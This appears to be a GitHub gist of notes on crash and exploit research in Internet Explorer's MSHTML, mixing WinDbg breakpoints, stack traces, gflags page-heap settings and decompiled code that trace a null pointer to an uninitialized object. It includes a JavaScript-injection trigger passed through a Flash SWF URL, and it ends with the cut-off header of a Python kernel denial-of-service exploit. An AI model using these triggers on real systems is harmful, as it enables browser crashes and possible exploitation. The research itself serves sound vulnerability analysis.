Created
May 15, 2013 05:58
-
-
Save hellok/5581908 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 69eb0000 mshtml base | |
| 6a29753c 8b8390000000 mov eax,dword ptr [ebx+90h] ds:0023:00000090=???????? | |
| 0:005> u 6A32536D | |
| MSHTML!CDisplayPointer::MoveToMarkupPointer+0xf6: | |
| 6a32536d e8ff231a00 call MSHTML!CDisplayPointer::GetLineInfo+0x200 (6a4c7771) | |
| bp MSHTML!CDisplayPointer::MoveToMarkupPointer+0xf6 | |
| bp MSHTML!CDisplayPointer::GetLineInfo+0x200 | |
| sxe ld mshtml | |
| ExternalInterface.call("0);}catch(e){};" + "location=\"javascript:''\"" + "//"); | |
| //setInterval("0);}catch(e){};location=\"javascript:\'\'\"", 5000); | |
| http://127.0.0.1/1.swf?js=location="javascript:''" | |
| c:\Program Files\Debugging Tools for Windows>gflags.exe /i iexplorer.exe | |
| No Registry Settings for iexplorer.exe executable | |
| c:\Program Files\Debugging Tools for Windows>gflags.exe /i iexplorer.exe +hpa +u | |
| st | |
| Current Registry Settings for iexplorer.exe executable are: 02001000 | |
| ust - Create user mode stack trace database | |
| hpa - Enable page heap | |
| c:\Program Files\Debugging Tools for Windows>gflags.exe /i iexplorer.exe +hpa +u | |
| st | |
| Current Registry Settings for iexplorer.exe executable are: 02001000 | |
| ust - Create user mode stack trace database | |
| hpa - Enable page heap | |
| c:\Program Files\Debugging Tools for Windows> | |
| windbg.exe -g -G -o "c:\Program Files\Internet Explorer\iexplore.exe" http://127.0.0.1/xss/1.swf?js=location="javascript:''" | |
| 6a7c0000 | |
| bp !mshtml+4753C5 ".printf \"MSHTML!CDisplayPointer::GetLineInfo+0x200 eax: %p\", eax;.echo;g" | |
| bp !mshtml+617689 ".printf \"MSHTML!"" ecx already 0 | |
| bp !mshtml+6176EA ".printf \"call CMarkup::EnsureTopElems(void)!"" ecx already 0 | |
| 6add76da e8ba84d6ff call MSHTML!CMarkupPointer::CurrentScope (6ab3fb99) | |
| 6add76df 85c0 test eax,eax | |
| 6add76e1 7540 jne MSHTML!CDisplayPointer::GetLineInfo+0x29a (6add7723) | |
| 6add76e3 8b44240c mov eax,dword ptr [esp+0Ch] | |
| 6add76e7 8b4824 mov ecx,dword ptr [eax+24h] here!! | |
| bp 6add76ef | |
| bp 6add76ea | |
| 0:010> kb | |
| ChildEBP RetAddr Args to Child | |
| 054bd058 6a4c77d7 00000000 0d2fede0 0d291498 MSHTML!CMarkup::EnsureTopElems+0xf | |
| this 指针NULL | |
| 054bd070 6a325372 0d295408 054bd090 0d2c4350 MSHTML!CDisplayPointer::GetLineInfo+0x266 | |
| 054bd09c 6a233daa 0d291498 0d295408 00000000 MSHTML!CDisplayPointer::MoveToMarkupPointer+0xfb | |
| IN THIS FUNC | |
| 054bd0d0 6a233b57 0d291498 0d295408 0d2caf68 MSHTML!CSelectionManager::CreateTrackerForContext+0x290 | |
| 054bd0f4 6a232d87 00000000 00000000 0d295408 MSHTML!CSelectionManager::SetEditContext+0xb5 | |
| 054bd164 6a236ea3 0d309de8 0d354088 00000000 MSHTML!CSelectionManager::SetEditContextFromElement+0x31c | |
| 054bd188 6a236d94 00000000 0d309de8 0e0b7fa8 MSHTML!CSelectionManager::SetInitialEditContext+0x6b | |
| 054bd1a4 6a237032 6a2e1a6c 0052fca8 0052f448 MSHTML!CSelectionManager::Initialize+0x1a2 | |
| 054bd1c8 6a166011 0e0b7fa8 0d3391b0 0e0cbdc8 MSHTML!CHTMLEditor::Initialize+0x174 | |
| 054bd1e8 6a2390c3 0d2a4d20 00000001 6c27a6ec MSHTML!CDoc::GetHTMLEditor+0x9f | |
| 054bd204 6a2a35ae 6c27a6ec 054bd258 00000000 MSHTML!CDoc::CreateServiceW+0x4f6 | |
| 054bd220 6c27a6d5 0052f448 6c27a494 6c27a6ec MSHTML!CDoc::QueryService+0x195 | |
| 054bd240 6c27a622 00000001 054bd258 0d2a3390 IEFRAME!CSelectionServicesListenerBase::_GetHTMLEditServices+0x41 | |
| 054bd260 6c27a523 054bd27c 0052fef8 00526140 IEFRAME!CSelectionServicesListenerBase::_GetSelectionServices2+0x33 | |
| 054bd280 6c27a86d 00526140 054bd2ac 0e095c00 IEFRAME!CSelectionInteractButtonHelper::_RegisterDocumentForNotifications+0x4a | |
| 054bd29c 6c2778cc 0e095c00 00509918 0052fef8 IEFRAME!CSelectionInteractButtonHelper::_s_MonitorRootDocument+0x5c | |
| 054bd2b0 6c27791b 00509744 00000000 00000004 IEFRAME!CSelectionInteractButtonHelper::s_AttachToWebBrowser+0x4a | |
| 054bd2cc 6c26e444 00509918 00000004 0e095c00 IEFRAME!CIEFrameAuto::COmWindow::ReadyStateChangedTo+0x48 | |
| 054bd500 6c26e56a 00000004 00000001 0d3391b0 IEFRAME!CDocObjectHost::_OnReadyState+0x90 | |
| 054bd564 6c26e4c0 0052ef38 054bd5b8 6a0fbdb1 IEFRAME!CDocObjectHost::_OnChangedReadyState+0xa6 | |
| 054bd570 6a0fbdb1 0052ef68 fffffdf3 0e0cbdc8 IEFRAME!CDocObjectHost::OnChanged+0x22 | |
| 054bd5b8 6a0fdc94 fffffdf3 00000001 054bd628 MSHTML!CBase::FirePropertyNotify+0x1b0 | |
| 054bd5f0 6a1b3bab 0e0cbdc8 00000004 0052f464 MSHTML!CMarkup::SetReadyState+0x409 | |
| 054bd65c 6a1b3a5a 0e0cbdc8 0052f464 0e0cbdc8 MSHTML!CMarkup::OnLoadStatusDone+0x2cf | |
| 054bd67c 6a1b3a4f 00000004 0054bec0 0054bef4 MSHTML!CMarkup::OnLoadStatus+0xb6 | |
| 054bdacc 6a11ff0c 00000000 00000014 054bdb18 MSHTML!CProgSink::DoUpdate+0x5dc | |
| 054bdadc 6a299f19 0d289f30 0d289f30 00000000 MSHTML!CProgSink::OnMethodCall+0x12 | |
| 054bdb18 6a2b9770 39e67f33 054bdbdc 00008002 MSHTML!GlobalWndOnMethodCall+0x115 | |
| 054bdb60 771e86ef 003c05e4 00000080 00000000 MSHTML!GlobalWndProc+0x302 | |
| 054bdb8c 771e8876 6a27460e 003c05e4 00008002 USER32!InternalCallWinProc+0x23 | |
| 054bdc04 771e89b5 00000000 6a27460e 003c05e4 USER32!UserCallWinProcCheckWow+0x14b | |
| 054bdc64 771e8e9c 6a27460e 00000000 054bfd9c USER32!DispatchMessageWorker+0x35e | |
| 054bdc74 6c28206c 054bdcbc 004ba7e8 004ba804 USER32!DispatchMessageW+0xf | |
| 054bfd9c 6c2a1dc6 004ba7e8 0049f9a8 777715e2 IEFRAME!CTabWindow::_TabWindowThreadProc+0x722 | |
| 054bfe58 777715f0 00838de0 004b7458 054bfe80 IEFRAME!LCIETab_ThreadProc+0x317 | |
| 054bfe68 6c29027b 0049f9a8 00000000 00000000 iertutil!CIsoScope::RegisterThread+0xab | |
| 054bfe80 77141154 004b7458 054bfecc 7796b299 IEFRAME!Detour_DefWindowProcA+0x6c | |
| 054bfe8c 7796b299 004b7458 776d1134 00000000 kernel32!BaseThreadInitThunk+0xe | |
| WARNING: Stack unwind information not available. Following frames may be wrong. | |
| 054bfecc 7796b26c 6c290258 004b7458 ffffffff ntdll!RtlInitializeExceptionChain+0x63 | |
| 054bfee4 00000000 6c290258 004b7458 00000000 ntdll!RtlInitializeExceptionChain+0x36 | |
| 0:005> dds esp+0c | |
| 0250c984 001ade68 | |
| 001ade68--->eax | |
| 64a177cf 8b4824 mov ecx,dword ptr [eax+24h] ds:0023:001ade8c=00000000 | |
| ba w4 001ade8c | |
| bp MSHTML!CDisplayPointer::MoveToMarkupPointer+0xf6 ".if(1){.echo call FUNC1;gc}" | |
| ba w4 001ade68 ".if(1){.echo w4 001ade68;dds 001ade68;gc}" | |
| ba w4 001ade8c ".if(1){.echo w4 001ade8c;r;u;t;gc}" | |
| 0:005> dds 001ade68 | |
| 001ade68 647b2218 MSHTML!CMarkupPointer::`vftable' | |
| 001ade6c 00000001 | |
| 001ade70 00000000 | |
| 001ade74 00000008 | |
| 001ade78 00000000 | |
| 001ade7c 00000000 | |
| 001ade80 00000000 | |
| 001ade84 647e8430 MSHTML!CTraversalMarkupPointer::`vftable' | |
| 001ade88 056cc6a8 | |
| 001ade8c 00000000 | |
| 对 eax+24h处指针修改来源于2处: | |
| 1. | |
| int __usercall CMarkupPointer::SetMarkup<eax>(int a1<eax>, int a2<edi>) | |
| { | |
| int v3; // ebx@5 | |
| if ( *(a2 + 48) & 8 ) | |
| { | |
| v3 = *(a2 + 36); | |
| *(a2 + 36) = a1; | |
| if ( a1 ) | |
| CMarkup::ElementAddRef(); | |
| if ( v3 ) | |
| CMarkup::ElementRelease(); | |
| } | |
| else | |
| { | |
| *(a2 + 36) = a1; | |
| } | |
| return (*(*a2 + 424))(a2); | |
| } | |
| 2.int __userpurge CMarkupPointer::CMarkupPointer<eax>(int a1<esi>, int a2) | |
| { | |
| *a1 = ITracker::_vftable_; | |
| *(a1 + 20) = 0; | |
| *(a1 + 24) = 0; | |
| *(a1 + 16) = 0; | |
| InterlockedIncrement(&g_lSecondaryObjCount); | |
| *(a1 + 48) &= 0xFFFFFF00u; | |
| *(a1 + 8) = 0; | |
| *(a1 + 32) = a2; | |
| *(a1 + 36) = 0; | |
| *(a1 + 40) = 0; | |
| *(a1 + 44) = 0; | |
| *(a1 + 56) = 0; | |
| *(a1 + 60) = 0; | |
| *(a1 + 64) = 0; | |
| *(a1 + 68) = 0; | |
| *(a1 + 4) = 1; | |
| *(a1 + 12) = 8; | |
| *a1 = &CMarkupPointer::_vftable_; | |
| *(a1 + 28) = &CMarkupPointer::_vftable_; | |
| *(a1 + 52) = -1; | |
| return a1; | |
| } | |
| 3.int __stdcall CMarkupPointer::Unposition(int a1) | |
| so the root reason is uninitialized object | |
| problem: | |
| 1.how to slow it down | |
| 2.when to jit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
!/usr/bin/python
Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if name == 'main':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2